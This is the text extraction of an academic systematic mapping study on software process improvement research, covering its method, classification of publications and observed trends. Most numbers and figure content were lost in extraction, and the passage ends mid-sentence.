mapping study, software process improvement introduction software process improvement (spi; according to humphrey, ) aims to improve software processes and comprises a variety of tasks, such as scoping, assessment, design and realization, and continuous improvement, e.g., münch et al. ( ). in this field, a number of spi models competes for the companies’ favor, success factors to support how to cite this article kuhrmann et al. ( ), software process improvement: a systematic mapping study on the state of the art. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:kuhrmann@mmmi.sdu.dk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. spi implementation at the large scale and the small scale are studied, and a multitude of publications report on experiences in academia and practice. horvat, rozman & györkös ( ) consider spi an important topic (regardless of the company size), as many companies put emphasis on the software process and its adaptation to the company context (diebold et al., ; vijayasarathy & butler, ; theocharis et al., ) to address different improvement goals, such accelerating software development or improving software quality. however, spi is a diverse field: on the one hand, a number of standards is available, e.g., the capability maturity model integration (cmmi) or iso/iec . on the other hand, these standards are criticized oftentimes, as for instance by brodman & johnson ( ), staples et al. ( ) and coleman & o’connor ( ). dictating processes and/or process improvement programs can lead to serious organizational ‘‘immune reactions’’ (baddoo & hall, ), e.g., of developers (umarji & seaman, ) and entire companies due to lacking resources (hall, rainer & baddoo, ). in response, several tailored standard spi models or custom spi approaches are proposed, inter alia, to better address needs of small and very small companies, e.g., raninen et al. ( ), rozman et al. ( ) and pino et al. ( ), or to adapt agile principles in the improvement process (salo & abrahamsson, ). moreover, since spi is mainly a human endeavor, much research was spent to study human factors, e.g., stelzer & mellis ( ), allison ( ), viana et al. ( ) and laporte & o’connor ( ). those factors, furthermore, play an important role when spi is conducted at the global scale, as for instance described by paulish & carleton ( ), or if large companies want to deploy agile processes as for instance presented by hannay & benestad ( ) or korhonen ( ). beyond, we find numerous experience reports, guidelines, and tools—all together providing a huge body of knowledge on spi. however, despite this comprehensive body of knowledge, from the authors’ perspective, we lack a big picture of spi and we still struggle to answer questions like: what is out there? what are open issues? are there new trends and emerging approaches, and if yes, what are the new trends? what is the current state of spi and related research after all? problem statement & objective. the field of spi evolved for decades and provides a vast amount of publications addressing a huge variety of topics. still, we see new method proposals, research on success factors, and plenty of experience reports. yet, missing is a big picture that illustrates where spi gained a certain level of saturation, what are the hot topics, and what are unresolved issues calling for more investigation? to better understand the state of the art in spi, we aim to analyze the whole publication flora to draw a big picture on spi. our overall goal is not to judge particular spi research directions, but to provide the focus points of the past and to illustrate emerging/unresolved areas to show the directions for future research in this field. contribution. in this article, we present findings from an updated comprehensive systematic mapping study. starting with a curiosity-driven study, in two stages, we conducted a broadband search in six literature databases and one meta-search engine to harvest spi-related publications from the past years, and we incrementally analyzed the resulting publications for publication frequency, research type facet, contribution type facet, and we categorized the found publications using a set of metadata attributes. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we draw a big picture showing that the majority of the publications on spi either proposes custom/new approaches (i.e., models or frameworks) or is of philosophical nature (i.e., collecting, structuring, and analyzing knowledge). our results show a constant publication of new approaches while evaluation of these proposals is scarcely available. our data shows rare evidence and, notably, missing long-term and independently conducted replication studies. however, the data also reveals some (still) emerging topics, e.g., spi for very small and medium-sized companies, and spi in the context of lean and agile methods. context & previously published material. the present study is a substantial update of our initial study published in kuhrmann et al. ( ). in the course of updating the study, in particular, we added the following procedures/content: to provide an instrument that allows for continuously updating the study, we defined a new data collection procedure (appendix ‘data collection in the study update’), which we implemented to carry out the update presented here. the update adds new papers to the result set, which now contains papes in total. furthermore, we modified the data classification approach. to achieve higher precision, we defined metadata attributes, and we applied these attributes to the dataset while excluding the focus type facet from the analysis (cf. ‘threats to validity’). finally, while our initial study aimed to identify major trends, in this article, we provide a more detailed analysis of the trends found using the new classification. outline. the remainder of this article is organized as follows: ‘related work’ summarizes and discusses related work. in ‘research design,’ we detail the study’s overall research design. since this article presents an updated systematic mapping study, the article’s appendix details the original and updated research methods as well as required reference data. we present and discuss the study results in ‘study results and discussion’, and conclude the article in ‘conclusion & future work.’ related work literature on software process improvement is rich and addresses a variety of topics. yet, available secondary studies mainly focus on investigating success factors, e.g., monteiro & de oliveira ( ), bayona-oré et al. ( ) and dybå ( ). some studies provide insights into selected spi topics, as for instance: helgesson, höst & weyns ( ) review maturity models, and hull et al. ( ) and el-emam & goldenson ( ) review different assessment models. pino, garcía & piattini ( ) contribute a review on spi in the context of small and very small companies, and staples & niazi ( ) study motivating factors to adopt cmmi for improvement programs, while müller, mathiassen & balshøj ( ) study spi in general from the perspective of organizational change. all these representatively selected studies address specific topics, yet they do not contribute to a more general perspective on spi. such general studies are scarcely to find. for instance, rainer & hall ( ) analyze some ‘core’ studies on spi for the purpose to work out addressed topics and gaps in the domain. however, they select few studies of which they assume to be good representatives thus providing a limited picture only. in terms of analyzing the entire domain and providing new (generalizable) knowledge, unterkalmsteiner et al. ( ) contribute a systematic review on the state of the art of evaluation and measurement in kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. spi. they conduct a systematic review for the purpose of synthesizing a list of evaluation and measurement approaches, which they also analyze for the practical application. the study at hand does not aim at generating generalizable knowledge for one or more spi-related topics in the first place. the purpose of the present study is to draw a big picture of the current state of the art of spi in general. that is, as there is no comparable study available, this article closes a gap in literature by providing a comprehensive picture of the development of the field of spi over time and by summarizing the current state of the art. other than, e.g., rainer & hall ( ) or unterkalmsteiner et al. ( ), we use the mapping study instrument according to petersen et al. ( ) as research method and to present our results. therefore, our study does not address one specific aspect/topic, but aims to draw a general picture from a ‘‘bird’s-eye perspective’’ to pave the way for further topic-specific and more detailed studies. research design in this section, we present the overall study design. after describing the selected research method, we introduce the research questions, and describe the different instruments used for data collection and analysis, and the validity procedures. research method in this study, we ground the overall research approach in the procedures implemented for our previously published initial study. in kuhrmann et al. ( ), we followed an approach in which we applied different methods from systematic literature reviews (slr) according to kitchenham & charters ( ) and systematic mapping studies (sms) as presented by petersen et al. ( ). while carrying out the study update, we used and improved the methods applied, which was necessary to develop a strategy that allows for continuous study updates. figure shows the overall research approach for which we provide details in subsequent sections. initial study. the initial study was designed as a breadth-first search to cover the spi domain as complete as possible. in february , we performed the study preparation, conducted a series of test runs, and refined the search queries iteratively. end of april , we conducted the main search, which resulted in about , hits. as we expected this large number of results and in order to support the dataset cleaning, we defined filter questions, which we applied to the initial result set. when the initial result set was cleaned, we performed a voting procedure to select the relevant publications from the result set. based on this selection, we developed the classification schemas (by manual sampling as well as tool-supported) and harmonized the dataset (e.g., completion of keyword lists). study update procedure. as one of the goals was to develop an instrument to provide a ‘‘heartbeat’’ of the whole field, having a strategy available to continuously update and refine the study was an imperative. therefore, after having conducted and analyzed the initial study, we collected lessons learned and developed the update strategy. the outcome is shown in the right part of fig. . the revised approach comprises a changed data collection procedure (appendix ‘data collection in the study update’) and an improved study kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. query&development data&source&selection t es t&r un &a nd & r ef in em en t data&collection publication& selection research&questions data&set& cleaning publication& classification filter&query& application develop&+&apply& classification data&set& harmonization query&update initial&metadata& selection t es t&r un &a nd & r ef in em en t data&source&selection in iti al &r es ul t&s et & a na ly si s data&collection data&cleaning&+& harmonization publication& selection publication& classification update&metadata figure overview of the applied research methods in the initial study (left part of the figure) as well as in the study update procedure (right part of the figure). classification procedure (‘analysis and classification’). the update procedure was defined in august , and the actual update was performed from september to november . in subsequent sections, we describe this new strategy, whereas the particular changes are documented in detail in the appendix of this article. research questions our objective is to capture the domain of software process improvement (spi), to provide a continuously updated snapshot of the available publication pool, and to investigate research trends. therefore, we define the following research questions: rq : what is the general publication population on spi? this research question aims to get an overview of the general publication pool on spi. we are interested in getting information regarding publication count, frequency and, eventually, an overview of the different research type facets addressed by the found publications. rq : what is the contribution population? based on the found publications, we are interested in the addressed topics and major contributions (e.g., spi models, theories, secondary studies, and lessons learned) to work out the spi topics to which research contributed so far. rq : what trends in spi and spi-related research can be observed? the third research question aims at investigating the focus points addressed by spi research so far, and to work out gaps as well as trends. this research question shall pave the way to direct future research on spi. data collection procedures as mentioned in ‘research method’, due to lessons learned in the initial study and in order to provide a feasible strategy for study updates, the research approach had to be improved. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. scopus is available from: http://www. scopus.com. before we made this decision, we tested scopus: we took some initial search queries (table ), queried scopus, and compared the obtained data with the original datasets. we then iteratively enhanced the scopus search strings and, eventually, defined the following quality requirement for the search: given the trends in publication frequency and classification obtained in the initial study, we expect a similar frequency and classification for the scopes-based search (see also ‘result overview’). table spreadsheet layout to collect, structure, and evaluate data. information set attributes and description study keys running no (unique number in the dataset), no (unique number in the database), database content title, authors, year, keywords/tags, abstract voting relevance (defined during further analysis and voting by the differ- ent authors, cf. ‘analysis preparation’), disc (decision field to be set in workshops if a paper was marked for discussion), result (paper is in or out) publication vehicle a publication is published in either a journal, magazine, conference, workshop, book, or miscellaneous (cf. fig. ) research type facet classification of a paper according to the research type facet (rtf) as proposed by wieringa et al. ( ) contribution type facet classification of a paper according to the contribution type facet (ctf) according to shaw ( ) (see also petersen et al., ) metadata collection of metadata per paper according to the structure from fig. further information further information and/or further metadata to be collected the most significant changes regarding the data collection procedure are described in appendix ‘data collection procedures.’ in the following, we describe the actual data collection procedure applied to the present study. query construction. the basic queries were already developed in the initial study (appendix ‘query construction’). after the initial result set analysis, the query strings were critically reviewed and updated (fig. ). however, no new search terms were added, only the structure of the queries required some updates to address the new data source that serves as main input. in a nutshell, due to the change of the search engine, the main search strings s –s were integrated with the context and filter queries, which were required in the initial study to help querying the different literature databases. the full new search queries can be depicted from table (appendix ‘search queries’). data sources and data format. in the present study, after reviewing the initial study designs and results, we looked for more efficient ways to fetch papers for the update and eventually opted for scopus as new search engine. having executed the different queries, obtained data was merged into one spreadsheet that structures the data and contains the attributes shown in table . the data structure shown in table follows the structure used in the initial study. analysis procedures we describe the analysis preparation as well as the steps conducted to answer the research questions. analysis preparation we performed an automated search that required us to filter and prepare the result set. the data analysis is prepared by harmonizing the data, performing a -staged voting process, and integrating the initial and the update data set to prepare the result set analysis. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.scopus.com http://www.scopus.com https://peerj.com http://dx.doi.org/ . /peerj-cs. publication+vehicle dimension:+process publication+ objective assessment+and+ assessment+models (quasi<)standards dimension:+ study+type/method dimension:+context life+cycle+phases company+size+and+scale application+domain journal magazine conference workshop book miscellaneous agile/lean process:simulation process:pattern/line product:management success:factors custom:model general:improvement cmmi iso/iec: general:measurement six:sigma bootstrap competisoft cont.:improvement psp/tsp iso/iec: iso/iec: survey/interview singleqcase:study multiqcase/long.:study replication:study slr/sms grounded:theory project:management quality:management requirements:eng. architecture implementation test vse/sme other:company:size gse embedded:systems telecommunications medical:devices automotive missionqcritical: defense business:is web/mobile/cloud skills:and:education xor figure overview of the collected metadata in the study analysis phase, including publication vehicles and study-specific attributes and their grouping in topic cluster (dimensions). kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table inclusion and exclusion criteria applied to the study. criteria description ic title, keyword list, and abstract make explicit that the paper is related to spi. ic paper presents spi-related topics, e.g., spi models, assessments, experiences in adopting and deploying software processes, and reports on improving specific methods/practices. ec paper is not in english. ec paper is not in the field of software engineering or computer science in general. ec paper is a tutorial or workshop summary only. ec paper occurred multiple times. ec paper full text is not available for download. harmonization. to make the selection of the contributions more efficient, we first integrated and cleaned the result set. we removed the duplicates, which we identified by title, year, and author list. the main instrument used was the microsoft excel feature to identify and remove duplicates (cf. appendix ‘search and cleaning procedure’). this procedure was performed on the integrated result set. voting. we applied the voting procedures as described in kuhrmann et al. ( ). that is, we performed a multi-staged voting process to classify the papers as relevant or irrelevant and to build a set of publications for further investigation (table , voting). in the voting process, the inclusion and exclusion criteria listed in table guided the decision-making process. two researchers performed individual votings (initially: publication title and abstract). if both agreed, the paper was directly included or excluded. for those papers that were not immediately agreed, workshops were performed to resolve disagreements. after the initial voting, the selection was reviewed by a third researcher for confirmation. integration. in the final step, we integrated the initial result set from kuhrmann et al. ( ) with the scopus update. due to the expected overlaps (search year ), we checked the result set for duplicates again and—if necessary—removed the found duplicates. analysis and classification on the final set, the analysis and classification were performed using the abstracts and—where necessary—the complete publication. generally, each classification step was conducted independently by two researchers, merged, discussed, and eventually checked by the third researcher. in the following, we summarize the analysis procedures used to answer our research questions. research type facets. in order to classify the publications, we rely on the classification according to the research type facet as proposed by wieringa et al. ( ). however, during a test classification on a small sample, we found the need to adjust the facet definitions. table lists the research type facets as applied to the result set. contribution type facets. in order to analyze what and how publications contribute to the body of knowledge, we adopted the contribution type facets as proposed by shaw ( ). table lists the facet types applied to the result set. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in the initial study kuhrmann et al. ( ), the focus type facets were found inadequate for this study stage, e.g., due to variety of the topics addressed and the limitations to define proper topic clusters or the need to have multiple assignments for many papers. table applied research type facets as proposed by wieringa et al. ( ). criteria description evaluation research implemented in practice, evaluation of implementation conducted; requires more than just one demonstrating case study solution proposal solution for a problem is proposed, benefits/application is demonstrated by example, experiments, or student labs; also includes proposals complemented by one demonstrating case study for which no long-term evaluation/dissemination plan is obvious philosophical paper new way of thinking, structuring a field in form of a taxonomy or a framework, secondary studies like slr or sms opinion paper personal opinion, not grounded in related work and research methodology experience paper personal experience, how are things done in practice table applied contribution type facets as proposed by shaw ( ). criteria description model representation of observed reality by concepts after conceptualization theory construct of cause–effect relationships framework frameworks/methods related to spi guideline list of advices lessons learned set of outcomes from obtained results advice recommendation (from opinion) tool a tool to support spi metadata. instead of applying the focus type facet to the result set, we opted for the collection of metadata. the metadata attributes of interest were initially collected and structured in a workshop in which the lessons learned from the initial study were taken into account. during the metadata collection, reviewers had the option to propose and add further attributes, i.e., the list of metadata was extended and then the result set was revisited (see also fig. ). figure provides a structured overview of the metadata. in particular, we collected metadata in the following four categories: publication vehicle, study type and method, process, and context. the publication vehicle is an xor-selection, i.e., a paper is for instance either a conference paper or a journal article. the other three categories (dimensions) can comprise sub-categories and allow for multiple selection. for example, a paper can contain an slr-based spi model, which is confirmed using an expert interview (dimension: study type and method), and the study can address an agile/lean custom model that adopts cmmi (dimension: process) in an sme company that works in medical devices, and improves quality management and test (dimension: context). validity procedures to increase the validity of our study, we implemented the following procedures: we extensively reused our initial research design, which we only modified in terms of the kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table data collection and filtering results of the study update, and total numbers of studies after merging and cleaning initial and update datasets. automatic search manual selection integration hits ec ec , voting discussion merge final s s , , s s , , s , s s , , s total , , , data collection procedures. furthermore, during the whole study, we performed several quality assurance activities (partially tool-supported), iterated through the single steps, and stepwise analyzed and refined tentative result sets. during the publication selection and classification, we relied on researcher triangulation, e.g., within a rigorous multi-staged voting procedure in which two researchers carried out the initial classification and the third researcher confirmed the classification. for the development of the classification schemas, we either ground the developed schemas in external proposals or rely on flexible and extensible metadata. finally, we continuously compared tentative results with findings from our initial study to check for general trends. study results and discussion in this section, we present and discuss the results of our study. in ‘result overview’, we provide an overview of the whole result set and discuss the development of the domain observed in the study update. ‘rq : general publication flora’, ‘rq : result set contribution,’ ‘rq : trends in spi-related research,’ answer the research questions, before we discuss our findings in ‘discussion’. finally, we discuss threats to validity of this study in ‘threats to validity.’ result overview in this section, we provide an overview of the whole result set. since the present study is an update study, the starting point for the study at hand is the result set from kuhrmann et al. ( ). an overview of this initial result set can be taken from table . the study update covers . years and comprises publications from january to july . the outcomes of the search, cleaning, and merge procedures are shown in table . the table shows seven papers removed in the merge procedures, which are multiple occurrences in (eight papers were found in the initial study, which were integrated with the update result set). figure visualizes the publication frequency of the integrated result set by showing the number of publications over time including two trend lines (trend calculation basis: kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure overall publication frequency (papers on spi published per year). mean, -year and -year period). in , the numbers show a growing interest in spi. from this point on, spi became an inherent part of software engineering research. figure shows periodical waves over the years starting three to five years, which is emphasized by the first -year trend line. within these waves the largest gap/decrease is between and . another big jump can be seen in , where the number of papers increased by approximately %. furthermore, fig. shows spi still being a field of interest, as the second -year trend line shows. the majority of the papers in the result set are journal articles (n= , . %) and conference papers (n= , . %). magazine articles (n= ) and workshop papers (n= ) count for . % and . %. the result set does not contain books, but three papers ( . %) that are classified as miscellaneous (mostly book chapters). in summary, the updated study includes papers on spi published between and july , which are subject to analysis. ‘rq : general publication flora’, ‘rq : result set contribution,’ ‘rq : trends in spi-related research’, we provide the detailed analysis to answer the research questions. result set quality assurance. as mentioned in ‘data collection procedures,’ we changed the data collection procedure and, thus, we defined the quality requirement that the update result set should ‘‘harmonize’’ with the initial result set, i.e., the update set should show similar trends and distribution. this quality assurance was carried out using the aforementioned trend analysis and using the different research- and contribution type facets (cf. ‘rq : general publication flora’). figure shows the average (absolute) paper numbers and the relative distribution per category. the figure visualizes these numbers for three data points: the average in the merged dataset, and the average of the data from – and the study update ( – ), respectively. given the trend (fig. ) and the about % increase of publications per year, still, the relative distribution of the papers in the update result set follows the general trend of the result set, which could just be observed in our initial study. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure overview of the (average) paper numbers and percentage in the result sets. both parts show a similar distribution in the different cate- gories in the entire result set and the subsets addressed by the initial study and the study update. rq : general publication flora to get an overview of the harvested papers, we performed a categorization to define the research type facets and contribution type facets (tables and ). to analyze the respective trends, fig. provides an integrated picture that shows the papers in the different categories and over time. regarding the research type facet, fig. shows a clear trend towards solution proposals (n= , . %) and philosophical papers (n= , . %). from the papers in the result set, papers ( . %) are classified as evaluation papers and papers ( . %) are classified as experience papers. only six out of papers ( . %) are opinion papers. taking into account the general trend of the result set (fig. ), the classification according to the research type facet indicates a still evolving research field. figure illustrates, in average, approx. % of the published papers per year are either proposing ‘‘something new’’ or discussing an spi-related topic from new/different perspectives, e.g., using secondary studies such as systematic reviews or mapping studies (n= , . %). at the same time, only about a quarter of the published papers per year deals with evaluating research or reporting experiences. figure (lower part) shows a similar tendency for the contribution type facet. from the papers in the result set, papers ( . %) contribute lessons learned, followed by papers ( . %) that contribute custom or new frameworks. all remaining categories are below %, in particular, models (n= , . %), theories (n= , . %), guidelines (n= , . %), advice (n= , . %), and tools (n= , . %). that is, approx. % of all papers either propose frameworks or discuss lessons learned, which is, again, consistent with the overall trend over time. an impression about the progress in the field can be depicted from fig. in which we create a first systematic map relating the research- and the contribution type facet. the figure shows that most of the frameworks have to be considered a solution proposal kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure number of papers per year and relative distribution over research type facet (a) and contribution type facet (b). ( out of ), but only papers from the category framework are classified as evaluation research. similar, about two third of all papers classified as lessons learned ( out of ) are classified as philosophical paper, i.e., lessons learned are drawn from discussion/observation in artificial or lab environments or concluded from secondary studies. from the lessons-learned papers, are classified as evaluation research and as experience reports, which together makes approx. % of all lessons learned papers. furthermore, out of papers that contribute models to the result set are classified as solution proposal ( papers) or philosophical paper ( papers). that is, models on spi are either proposed awaiting their evaluation or those models are concluded from discussion or secondary studies, also awaiting evaluation. the same picture can be observed for theories: out of papers that are classified as contributing a theory are also classified as philosophical paper, and only two are classified as evaluation research. summary. from the top-level analysis using the basic classification schemas, we can observe: in the result set, we see a clear trend towards proposing new solutions, and the majority of the proposed solutions considers spi frameworks. a second major trend is reporting lessons learned. these trends can be observed in the final result set as well as over time. regarding the proposed frameworks, approx. % ( out of framework-related papers) are classified as solution proposals, i.e., method- or framework proposals without kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure systematic map over research- and contribution type facets. any evaluation or with theoretical or lab-based evaluation only. similar, approx. % of all reported lessons learned ( out of ) are classified as philosophical paper, i.e., conclusions are drawn from theoretical or lab-based evaluation only. in summary, the big picture presented in this section shows a still evolving research field, which is developing new approaches and collecting lessons learned, but this field still lacks evaluated models and theories. rq : result set contribution in this section, we provide a more detailed perspective on the result set using the collected metadata as illustrated in fig. . while classifying the result set, we collected metadata for the three dimensions study type and method, process (incl. sub-categories), and context (incl. sub-categories). in addition to the publication vehicle, we defined attributes, and each paper could be assigned none or many of these attributes (‘analysis and classification’). in total, for the studied papers, we assigned , attribute values. all metadata assignments are summarized in fig. and discussed in the following. dimension: process. within this dimension, we built the three categories assessment and assessment models, (quasi-)standards, and publication objective, which provide the following insights: within the topic of assessment and assessment models, we focused on common assessment (maturity) models. most frequently mentioned is cmmi with assigned papers, followed kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to ta l agile/lean process simulation process line/patterns product line/management success factors custom model general improvement cmmi iso/iec general measurement six sigma bootstrap competisoft continuous improvement psp/tsp iso/iec iso/iec survey/interview single casenstudy multincase/long. study replication study slr/sms grounded theory project management quality management requirements engineering architecture implementation test vse/sme other company size gse embedded systems telecommunications medical devices automotive missionncritical defense business is web/mobile/cloud skills and education a p p li c a ti o n d o m a in d im en si on : p ro ce ss d im en si on : c on te xt p u b li c a ti o n o b je c ti v e a s s e s s m e n t a n d a s s . m o d e ls ( q u a s in ) s ta n d a r d s ( a n d t e c h n iq u e s ) d im en si on : s tu dy ty pe a nd m et ho d l if e c y c le p h a s e s c o m p a n y s iz e a n d s c a le figure overview of the different metadata attributes addressed over time. the darker the color, the more papers in a year have this attribute as- signed, whereas a paper can have multiple attributes assigned. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. by iso/iec , which is assigned to papers. beyond the common standards, papers are devoted to measurement in general. a more detailed discussion on the standard approaches cmmi and iso/iec can be found in ‘new and customized spi models’. regarding the (quasi-)standards (and techniques), the overall result set indicates these aspects considered of low relevance for the community. most frequently mentioned are six sigma, continuous improvement, and psp/tsp (each with less than mentions). not yet clear is the relevance of standards like iso/iec —we see some mentions, but there is some movement and continuous development of such standards. therefore, a trend analysis is yet not meaningfully to conduct. in the publication objective category, we analyzed the major research directive of a publication. figure shows four attributes in the spotlight: a considerable share of the papers ( out of ) deals with custom or new models, and the data shows the number of custom/new models continuously increasing. this trend, which was already found in the initial study, is discussed (together with the use of standard approaches) in ‘new and customized spi models’. furthermore, papers cover general improvement as a trend. additionally, the result set contains papers addressing spi success factors with an increasing interest over the years. in ‘spi success factors,’ we provide more details on this topic. finally, with mentions, agile and lean development constitutes the fourth trend with increasing number of publications. we provide details in ‘spi and agility’. dimension: study type and method. within the six different attributes defined for this di- mension, fig. shows single and multiple/longitudinal case studies the major instruments, followed by survey research and interview studies. however, as these instruments are often combined, i.e., in many case studies, data collection is carried out using interviews. although the result shows so-called mixed method approaches applied to spi research, still, single case studies (quite often carried out with students in lab environments) account for the majority of the selected research methods. nevertheless, in recent years, an increasing number of secondary studies (i.e., systematic reviews and mapping studies) could be found. this indicates the community starting to systematize and categorize spi knowledge. the result set clearly shows the research field lacking replication studies. dimension: context. within the dimension context, we defined the three categories life cycle phase, company size and scale, and application domain, which provide the following insights: regarding the life cycle phases, project management ( mentions) and quality manage- ment ( mentions) are in the spotlight (continuously covered and without specific peaks). they are followed by requirements engineering ( mentions) and testing ( mentions), whereas testing as topic is often combined with (general) quality management. architecture and design as well as implementation received few mentions (less than each). the companies sizes and scales addressed in the papers show a trend towards very small entities (vse) and small-to-medium-sized enterprises (sme). in the result set, papers deal with companies of this sort, while papers address companies of other scales, i.e., large companies and global players. in ‘spi for smes’, we investigate this attribute group in more detail. furthermore, global distribution of software development is addressed kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. by papers, whereas this is a cross-cutting concern that is addressed by companies of all sorts. considering the different application domains, the largest share of papers deals with embedded systems in general ( mentions) or specific embedded domains such as medical devices, automotive software, or mission-critical and defense systems (less mentioned specific embedded domains are classified under general). the application domain of telecommunication systems is mentioned times. we also consider the papers addressing skills and education, e.g., by describing industrial training programs or university courses, as application domain. summary. figure presents an overview of the metadata attributes assigned to the papers from the result set. the figure shows the major trends that we already observed in our initial study (kuhrmann et al., ): spi-related research has a strong focus on custom/new models and success factors, standard assessment/maturity models like cmmi or iso/iec are well-researched, and spi in the context of vses/smes and agile and lean software development as part of spi have to be considered major trends. the set of metadata attributes defined for this study provides further insights: for instance, major fields of interest in spi research are project management and quality management (often in combination with testing), and spi is relevant to all application domains and to all company sizes (which confirms horvat, rozman & györkös, ). however, we also have to mention that due to the nature of this study, we were so far not able to assign attributes for all dimensions to all papers. only papers ( %) were assigned to attributes covering all three dimensions, papers ( %) cover two dimensions, and ( %) have attributes in only one dimension. therefore, the presented overview does not yet provide a complete picture, and we discuss this threat to validity in ‘threats to validity’. rq : trends in spi-related research our initial study kuhrmann et al. ( ), inter alia, had the purpose to reveal trends in spi-related research to identify those fields that have reached a certain saturation and those that either require more attention or reflect a particular problem-driven need. the initial results pointed to trends or streams worth further inspection: (new) spi models, spi success factors, spi in small-to-medium-sized enterprises (sme), and agility as spi. in subsequent sections, we primarily focus on these trends/streams, before discussing further observations. new and customized spi models in the field of spi, existing (standard) models are customized or completely new models are proposed. this trend can be observed now for years, as fig. illustrates. starting from the very beginning on, new or customized models are proposed every year. in total, the result lists out of papers (approx. %) with this purpose. as shown in fig. , in the present study, we collected metadata regarding different (quasi-) standard and well-disseminated approaches. in the following, we provide a detailed analysis on the share of customized and new models, and we analyze how these approaches are integrated with each other and what their scientific maturity is. figure shows a systematic map that illustrates two aspects: in lower part the research maturity and the contribution of papers addressing standard maturity models is shown. in total, out kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure trend chart of the share of papers that present customized and/or new spi models. of papers address cmmi, iso/iec or both. the classification according to the research- and contribution type facet shows that for standards and standard-related spi research many lessons learned are reported and that some evaluation research is available. from those papers addressing standard approaches, deal with developing customized spi models, which are grounded in these standards. whether a custom/new spi model is based on one of the standards is visualized in the upper part of fig. . from the papers proposing custom/new spi models, are based on the standard models, i.e., papers do not ground their contribution in standards and use other practices. in particular, four papers mentioned to reuse/extend six sigma, eight reused/extended the continuos improvement principle, three papers refer to psp/tsp, and one paper refers to competisoft. moreover, fig. shows that the result set contains solution proposals, but only papers that are categorized as evaluation research or experience paper. among the papers, ( . %) explicitly mention to cover spi for smes (see also ‘spi for smes’) with a focus on improving the project management (four papers) and general quality management processes (three papers). the processes associated with the different life cycle phases (fig. ) are represented as follows: ( . %) papers aim at improving the general quality management, ( . %) address project management, and ( . %) aim to improve the test process. that is, the focus of the custom/new spi models is on quality management and testing ( . % in total). summary. the trend observed in our initial study could be confirmed: out of papers propose custom or new spi approaches, which makes in average new spi models published per year. only out of these papers ground their contribution in a standard approach, whereas the majority (approx. %) of the solution proposals does not explicitly rely on standardized approaches. furthermore, the result set shows that the majority of the papers proposing entire spi methods or frameworks of which few are evaluated (the majority are solution proposals). moreover, the result set shows few models or theories on spi among the proposed solutions. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure overview of the classification of publications addressing the standard approaches cmmi and iso/iec (n = ), and their rela- tion to custom/new models (n = ). spi success factors figure visualizes the second trend observed: the quest for spi success factors. in the result set, out of papers (approx. . %) are devoted to success factors. the figure shows this quest starting in the mid s, and an increasing interest starting around . in the following, we provide an overview how success factors are collected, studied, applied, and evaluated. the first questions of interest address the origin and maturity of the success factors, i.e., their general reliability. for this, we analyzed the research- and contribution type facets of the papers containing the success factors. figure provides this categorization and shows that of the papers ( . %) are classified as philosophical papers, i.e., papers that are either a secondary study or that provide a discussion-based research approach. however, papers ( . %) derive their success factors either from evaluation research or experience reports. furthermore, for papers ( . %), success factors are contributed kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure trend chart of the share of papers that investigate success factors in spi. figure summary of papers addressing success factors in spi categorized according the research- and contribution type facets. as lessons learned; papers ( . %) structure and integrate success factors in frameworks, and papers ( . %) use success factors to develop a model or a theory. figure suggests success factors mainly crafted from secondary studies and discussion. in order to provide more insight, we used the study type and method dimension to study the research approaches chosen for the collection of success factors. figure provides the summary of the chosen research methods. the figure shows survey/interview and case study research being the preferred methods. only out of papers rely on secondary studies (systematic reviews and mapping studies), and only four papers use a multi-method research approach (either survey with case study research, or a secondary study combined with survey research and grounded theory). for papers, an explicitly mentioned research approach could not be found in the abstract-based analysis. figure also shows that only papers ( multi-case/longitudinal study, replication study, and multi-method) go beyond ‘‘one-time research’’, i.e., these papers study success factors over time, from different angles, and/or apply them and learn from the application. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure summary of the research methods applied to study spi success factors. figure trend chart of the share of papers spi in the context of smes. summary. the second trend observed in our initial study could be confirmed: out of are devoted to the collection and study of success factors. the majority of the papers is classified as philosophical papers, i.e., these papers report secondary studies or discussion- based studies, and most of the papers present success factors as lessons learned. however, the data also indicates success factors being crafted from limited research in terms of long-term observation or evaluation from different angles. only papers mention a respective research approach. furthermore, out of papers are categorized as secondary studies, i.e., there is an observable trend to foster information collection and aggregation. spi for smes the third trend observed in the initial study was an increasing interest in spi for 